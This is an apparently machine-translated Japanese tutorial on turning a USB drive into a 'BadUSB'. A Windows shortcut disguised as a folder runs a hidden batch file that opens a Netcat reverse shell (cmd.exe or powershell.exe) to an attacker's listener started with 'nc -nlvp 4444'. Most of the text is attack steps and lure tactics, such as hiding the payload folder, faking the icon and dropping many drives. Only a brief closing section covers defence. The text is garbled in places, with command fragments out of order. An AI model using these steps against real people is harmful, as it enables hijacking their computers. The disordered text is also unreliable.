悪意のある USB デバイスのすべてが、コンピューターに損害を与える高度なプログラミングを備えた高価なハードウェアである必要はありません。古い USB ドライブでは、Windows ショートカット ファイルを使用して独自の悪意のある BadUSB を作成し、ペイロードにリンクすることができます。 マカフィーのブログ記事「 よると、「2022 年の第 2 四半期に、マカフィー ラボは、LNK ファイルを使用して配信されるマルウェアの増加を確認しました。攻撃者は LNK の使いやすさを悪用して、Emotet、Qakbot、IcedID、Bazarloaders などのマルウェアを配信するために使用しています。」 LNK (ショートカット) マルウェアの台頭」に LNK ファイルが一見無害に見える USB ドライブにマルウェアを配信する方法を調べます。検出が困難なマルウェアを Windows ショートカット ファイル (LNK ファイル) に組み込むことで、偽装されたリンクがユーザーを操作し、無害に見えるファイルをクリックしてマルウェアを起動させます。 LNK ファイルのショートカットを使用すると、プログラムのフル パスを移動しなくても、実行可能ファイルにすばやく簡単にアクセスできます。この状況では、マルウェアの実行可能ファイルが隠しディレクトリにあります。ユーザーが実行可能ファイルにリンクしているフォルダをクリックすると、マルウェアが起動します。 このエクスプロイトの実行可能ファイルは、Netcat または単に です。 nc Netcat はマルウェアではありませんが、Windows Defender ではマルウェアとしてフラグが付けられているため、このウォークスルーではマルウェアと呼びます。 ネットワーク管理者によって使用され、多くの用途がある Netcat は、リモート コンピューターを別のコンピューターに接続できるようにする一般的なツールです。 Netcat を使用してリバース シェルを確立すると、攻撃側のマシンはシェル アクセス権を持ち、被害者のコンピュータを完全に制御できます。 このセクションの最後では、LNK ショートカット USB 攻撃から身を守る方法について説明します。 どうやって始めるのか USB ドライブをコンピュータに挿入します。 Windows でフォーマットされた任意の USB ドライブを使用できます。この例のペイロードのサイズはわずか 45K なので、どのドライブでも動作するはずです。 右クリックして新しいフォルダーを作成します。このフォルダーには任意の名前を付けることができますが、この例では、適切な名前の ディレクトリを使用します。最終的にこのディレクトリを非表示にします - その方法については後で詳しく説明します。 ペイロード 作成したフォルダを開きます。ここにマルウェアをインストールします。 、 ファイルをこのフォルダーにコピーします。 GitHub から nc64.exe 実行可能ファイルをダウンロードし nc64.exe 「BadUSB」ドライブの構成 ペイロードをドライブにコピーしたら、バッチ ファイルの作成から始めて、USB ドライブのファイル システムを変更する必要があります。 バッチ ファイルを作成する バッチ ファイルは、コンピュータが実行する Windows コマンドを発行する場所です。 Windows のメモ帳を使用して、テキスト ファイルを作成します。このファイルには、攻撃を開始する単一のコマンドが含まれています。 この例の IP アドレスとポートを、Netcat を実行している攻撃ホストに置き換えます。 パラメータを使用すると、接続に使用するシェルを指定できます。 Windows システムでは、 または を使用できます。後で、被害者のコンピューターからの接続を受け入れる Linux サーバーを構成します。 -e cmd.exe powershell.exe ファイルを 拡張子で保存し、[ファイルの種類] が [すべてのファイル] に設定されていることを確認します。バッチ ファイルと実行可能ファイルが同じディレクトリにあることを確認します。 .cmd ペイロード ディレクトリには、実行可能ファイルとバッチ ファイルの 2 つのファイルが含まれている必要があります。 ショートカットの作成 この攻撃が成功した理由の 1 つは、Windows ショートカットを作成し、隠しディレクトリにマルウェアへのリンクを作成できることです。ユーザーにマルウェアをクリックさせるには、クリックさせる必要があります。うまくいけば、ほとんどのユーザーは自分のコンピューターでランダムなアプリケーションを実行しないことを知っています。しかし、ユーザーは興味深い名前のフォルダを開こうとします。 USB ドライブのルート ディレクトリを右クリックし、[ショートカット] を選択して、ショートカットを作成します。 前の手順で作成したバッチ ファイルを選択します。この例では、 ディレクトリから ファイルを選択し、[次へ] をクリックして続行します。 ペイロード run_exploit.cmd ショートカットには、ユーザーがクリックして [完了] をクリックできるような興味深い名前を付けます。 新しく作成したリンクは正しくないように見えます。好奇心旺盛なユーザーでさえ、アイコンをクリックするのを躊躇するはずです。幸いなことに、Windows にはファイルとリンクのデフォルト アイコンを変更できる機能があります。 リンクを右クリックし、[プロパティ] を選択します。 [アイコンの変更] ボタンをクリックします。 アイコンをフォルダに変更します。 [OK] をクリックして、[アイコンの変更] ウィンドウを閉じます。 [OK] をクリックして変更を適用し、ファイルの [プロパティ] ウィンドウを閉じます。 これで、ショートカットがリンクのように見えなくなりました。左下に従来のリンク矢印が残っていますが、これは好奇心旺盛なユーザーの気軽な検査に合格するはずです。 マルウェア フォルダを非表示にする 私たちは、ほぼ、そこにいる。 フォルダが表示されているため、ドライブはまだ正しく表示されません。ドライブを非表示にすることでこれを修正します。 フォルダーを右クリックし、[プロパティ] を選択します。 ペイロード ペイロード [非表示] チェックボックスを選択し、[OK] をクリックして変更を適用し、ウィンドウを閉じます。 [このフォルダー、サブフォルダー、ファイルに変更を適用する] を有効にして、[OK] をクリックします。 ドライブは準備が整っており、展開する準備ができています。ユーザーが USB ドライブをコンピュータに挿入すると、これが表示されます。 Simple Malicious USB ショートカットは、通常の Windows フォルダーのように見え、無害に見えます。好奇心旺盛なユーザーや観察力のないユーザーがフォルダーを開こうとすると、悪意のあるペイロードが起動されます。ただし、Simple Malicious BadUSB を展開する前に、コマンド アンド コントロール サーバーをセットアップする必要があります。 コマンド アンド コントロール サーバーのセットアップ 当社のコマンド アンド コントロール (C&C) サーバーは攻撃者によって制御され、マルウェアによって侵害されたコンピューターからコマンドを送受信するために使用されます。このエクスプロイトのサーバーは、 がインストールされた最新のソフトウェアを実行する Ubuntu マシンです。 netcat この例では、 (DNS を使用しない)、 (着信接続のみをリッスンする)、- (詳細)、および (ポート番号) を使用します。 コマンドでリスナーを開始します。サーバーは、ポート 4444 で着信接続を辛抱強く待ちます。 -n -l v -p nc -nlvp 4444 ユーザーが USB を挿入してショートカットをクリックすると、バッチ ファイルは、先ほど指定した IP アドレスとポート番号を使用して コマンドを実行します。接続は迅速かつ効果的です。 nc64.exe この時点で、マシンは侵害され、攻撃者は被害者のコンピュータへのフル シェル アクセスを取得します。ハッカーは、端末に直接座っているかのようにコマンドを発行できます。 この脆弱性に対する防御 このエクスプロイトが機能するには、いくつかのことが正しく行われる必要があります。 誰かが拾う場所にこれをドロップする必要があります 被害者は、すべてのコンピューターの衛生状態を無視して、自分のコンピューターにインストールする必要があります 被害者は Windows を実行している必要があります 被害者のコンピューターは、すべての更新プログラムとパッチが適用された最新の Windows を実行していてはなりませ 。 ん 被害者は興味を持ってリンクをクリックし、 ディレクトリに隠されたマルウェアを実行する必要があります。 ペイロード これらすべての状況が攻撃者に当てはまる場合、これはランサムウェア攻撃の成功です。この種の攻撃では、数値は攻撃者に有利に働きます。 100 台の BadUSB デバイスが 1 か所にドロップされた場合、1 人だけがリンクをクリックして被害者になります。 Microsoft ウイルスおよび脅威対策を有効にする エンドポイント検出 (EDR) は、悪意のあるコードの実行からユーザーを保護するのに非常に優れています。現在サポートされているすべてのバージョンの Windows に組み込まれており、ウイルスと脅威からの保護が異常な動作を監視します。 Microsoft ウイルスと脅威からの保護設定が有効になっている場合、ユーザーが BadUSB を挿入すると、このメッセージが表示されます。 Microsoft EDR はファイルを隔離し、ドライブ上に存在しなくなるため、攻撃は失敗します。その結果、マルウェアは削除され、実行できなくなります。 潜在的な被害者にとって良いニュースは、ほとんどの人がランダムな USB デバイスを自分のコンピューターに接続しないことを知っているということです。ただし、接続した場合、Microsoft エンドポイント セキュリティ ソフトウェアが悪意のあるソフトウェアの実行を防ぎます。